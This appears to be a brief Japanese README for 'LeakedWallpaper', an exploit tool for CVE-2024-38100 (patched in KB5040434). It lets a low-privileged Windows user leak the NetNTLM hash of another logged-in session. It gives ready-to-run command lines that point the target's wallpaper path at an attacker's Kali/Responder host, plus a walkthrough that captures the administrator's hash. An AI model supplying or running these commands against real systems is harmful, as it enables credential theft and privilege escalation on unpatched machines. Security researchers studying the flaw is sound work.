
任意のユーザーのNetNTLMハッシュの漏洩。KB5040434で修正済み。
これは権限昇格ツールです(KB5040434 で CVE-2024-38100 として修正済み)。低権限ユーザーで作業している場合でも、コンピューター上の任意のセッションからユーザーの NetNTLM ハッシュを漏えいさせることができます。
.\LeakedWallpaper.exe <session> \\<KALI IP>\c$\1.jpg [-downgrade]
# Example
.\LeakedWallpaper.exe 1 \\172.16.0.5\c$\1.jpg -downgrade
ブロックされている場合は、demo.mkv を参照してください。
ホスト上に2つのセッションがあるとします。
現在のセッション ID: 2
対象セッション ID: 1

Responder IP: 172.16.0.5
Windows IP: 172.16.0.2

このツールを使って administrator の NetNTLM ハッシュを取得しましょう!
.\LeakedWallpaper 1 \\172.16.0.5\c$\1.jpg
成功!
